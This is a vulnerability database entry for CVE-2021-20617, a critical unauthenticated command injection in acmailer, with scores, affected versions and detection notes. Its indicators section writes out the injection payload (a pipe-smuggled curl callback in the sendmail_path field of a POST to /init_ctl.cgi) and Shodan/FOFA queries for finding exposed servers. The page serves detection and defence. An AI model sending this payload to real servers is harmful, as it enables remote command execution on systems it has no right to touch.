cbcvebase.
CVE-2021-20617
published 2021-01-14

CVE-2021-20617: Improper access control vulnerability in acmailer ver. 4.0.1 and earlier, and acmailer DB ver. 1.1.3 and earlier allows remote attackers to execute an…

PriorityP182critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
7.87%
94.0th percentile
Improper access control vulnerability in acmailer ver. 4.0.1 and earlier, and acmailer DB ver. 1.1.3 and earlier allows remote attackers to execute an arbitrary OS command, or gain an administrative privilege which may result in obtaining the sensitive information on the server via unspecified vectors.

Affected

3 ranges
VendorProductVersion rangeFixed in
acmaileracmailer<= 4.0.1
acmaileracmailer_db<= 1.1.3
seeds_co_ltdacmailer_and_acmailer_db

Detection & IOCsextracted from sources · hover to see the quote

urlPOST /init_ctl.cgi
path/init_ctl.cgi
commandsendmail_path=|curl http://{{interactsh-url}}
othershodan: title="ACMAILER4.0"
otherfofa: title="ACMAILER4.0"
  • Exploit targets the /init_ctl.cgi endpoint via HTTP POST with a pipe-injected sendmail_path parameter to trigger OS command execution via curl callback (OOB/OAST detection).
  • Successful exploitation results in an HTTP 302 redirect response; monitor for 302 responses from /init_ctl.cgi combined with OOB curl callbacks.
  • OOB confirmation: look for inbound HTTP requests with 'User-Agent: curl' originating from the target server after a POST to /init_ctl.cgi.
  • Content-Type of the exploit request is application/x-www-form-urlencoded; filter POST requests to /init_ctl.cgi with this content type and a pipe character in the sendmail_path field.
  • Exposed acmailer instances can be discovered via Shodan/FOFA using the title fingerprint 'ACMAILER4.0'; use this to identify internet-facing vulnerable assets.
  • ·The exploit payload uses a pipe-injected sendmail_path (|curl ...) to achieve OS command injection; the injection vector is the sendmail_path POST parameter, not a separate binary or config file.
  • ·Vulnerability affects acmailer ver. 4.0.1 and earlier, and acmailer DB ver. 1.1.3 and earlier; scope is limited to these version ranges.
  • ·The attack vector is unauthenticated (PR:N, UI:N) — no prior authentication or user interaction is required to exploit /init_ctl.cgi.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.